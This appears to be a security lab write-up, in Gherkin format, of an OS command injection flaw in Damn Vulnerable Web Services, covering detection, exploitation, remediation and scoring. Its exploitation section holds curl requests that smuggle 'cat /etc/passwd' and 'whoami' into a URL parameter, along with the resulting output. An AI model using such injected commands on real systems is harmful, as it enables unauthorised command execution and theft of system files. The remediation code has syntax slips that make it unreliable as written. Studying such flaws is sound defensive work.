## Version 1.4.1
## language: en

Feature:
  TOE:
    Damn Vulnerable Web Services - dvws
  Category:
    Improper Neutralization of Special Elements ('OS Command Injection')
  Location:
    http://dvws/admin.html
  CWE:
    CWE-78: https://cwe.mitre.org/data/definitions/78.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Execution of custom commands on the remote system
  Recommendation:
    Use language specific functionality instead of external process calls

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows10       | 2004        |
    | Chromium        | 85.0        |
    | Virtualbox      | 6.1         |
    | Vagrant         | 2.2.10      |
    | Ubuntu          | 20.04       |
    | Docker          | 19.03       |
  TOE Information:
    Given I am accessing the followin url "http://dvws/"
    And DVWS is running within a docker container
    And is built with nodejs, angular and mongodb

  Scenario: Normal use case
    Given I have an account with admin privileges
    And I login in the platform with it
    Then I open "http://dvws/admin.html"
    And I can see in the bottom of the page the following info
    """
    System Information: "Hostname: Linux ubuntu-focal 5.4.0-47-generic
    #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 x86_64
    x86_64 x86_64 GNU/Linux\n"
    """
  Scenario: Static detection
    When I look at the code in "./routes/notebook.js"
    Then I can see the route "/v2/sysinfo/:command"
    And I see the route calls "get_sysingo()"
    Then I inspect the code at "./controllers/notebook.js"
    And I find the function "get_sysingo()"
    And I see the user input is not safely parsed
    Then I see It's being caused by "./container/notebook.js" from line 55 to 63
    """
    get_sysinfo: (req, res) => {
      exec(req.params.command + " -a", (err, stdout, stderr) => {
        if (err) {
          res.json(err)
        } else {
          res.json(`Hostname: ${stdout}`);
        }
      });
    },
    """
    And I can conclude that I can access this resource with any valid session
    And I can run any command appended with ";ls" or "#"


  Scenario: Dynamic detection
    Given I have an account with admin privileges
    And I login in the platform with it
    Then I open "http://dvws/admin.html"
    And I can see the output at the bottom of the page
    """
    System Information: "Hostname: Linux ubuntu-focal 5.4.0-47-generic
    #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 x86_64 x86_64
    x86_64 GNU/Linux\n"
    """
    And I know that output looks pretty similar to the "uname -a" output
    Then I open the chrome dev tools in the source tab
    And I search for a javascript function in charge of displaying that info
    And I found it "getSysInfoa()"
    Then I look for the route this function is using
    """
    var get = $http({
      method: "GET",
      url: "/api/v2/sysinfo/uname",
      dataType: 'json',
      headers: { "Content-Type": "application/json" },
      headers: { 'Authorization': 'Bearer ' +
                  localStorage.getItem('JWTSessionID') }
    });
    """
    And I can conclude the application is vulnerable to command injection

  Scenario: Exploitation
    Given I'm in the linux terminal
    And I have a valid jwt/session token
    Then I make a request to "/api/v2/sysinfo/{command}"
    """
    curl 'http://dvws/api/v2/sysinfo/cat%20%2Fetc%2Fpasswd%20%23' \
    -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2Vy
    IjoicGVhc2VudDAyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSI
    sInVzZXI6YWRtaW4iXSwiaWF0IjoxNjAwMzA2Nzk2LCJleHAiOjE2MDA0Nzk1OTYsImlzcy
    I6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.LXhMGsWPSO47NFk432A_
    1MTgdpRxSHzN34PlE3P6uAw'
    """
    And I get the following result
    """
    "Hostname: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:
    /usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:
    /dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:
    x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:
    /usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:
    8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/
    """
    And I can run arbitray commands on the remote system
    And I don't need admin privileges
    """
    curl 'http://dvws/api/v2/sysinfo/whoami%20%23'
    -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjo
    icGVhc2VudDAyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSIsInVzZ
    XI6YWRtaW4iXSwiaWF0IjoxNjAwMzA2Nzk2LCJleHAiOjE2MDA0Nzk1OTYsImlzcyI6Imh0dHB
    zOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.LXhMGsWPSO47NFk432A_1MTgdpRxSHzN
    34PlE3P6uAw'
    """
    And I can execute commands as root
    """
    "Hostname: root\n"
    """
    Then any user with a valid jwt can run any command on the remote system

  Scenario: Remediation
    Given the function is not sanitizing user supplied input
    Then I edit the function "get_sysinfo()"
    And I use the nodejs "os" library to replicate the output of "uname -a"
    """
    const os = require('os);
    get_sysinfo: (req, res) => {
      const info = `Hostname ${os.hostname} ${os.release} \
        ${os.version()} ${os.arch()} ${os.platform()}`
      res.json(info);
      //exec(req.params.command + " -a", (err, stdout, stderr) => {
      //  if (err) {
      //    res.json(err)
      //  } else {
      //    res.json(`Hostname: ${stdout}`);
      //  }
      //});
    },
    """
    And now there is no room for os command injection
    Then I modify the function again to check for admin rigths
    """
    const os = require('os);
    get_sysinfo: (req, res) => {
      if(req.decoded.permissions.includes("user:admin")) {
         const info = `Hostname ${os.hostname} ${os.release} \
           ${os.version()} ${os.arch()} ${os.platform()}`
         res.json(info);
      } else {
         result = {
           error: "Not Allowed",
           status: 401
         };
         res.status(401).send(result);
      }
      //exec(req.params.command + " -a", (err, stdout, stderr) => {
      //  if (err) {
      //    res.json(err)
      //  } else {
      //    res.json(`Hostname: ${stdout}`);
      //  }
      //});
    },
    """
    And now only an user with an admin role can access this resource

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.6/10 (Critical) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.4/10 (Critical) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.4/10 (Critical) - CR:H/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date {2020-09-17}
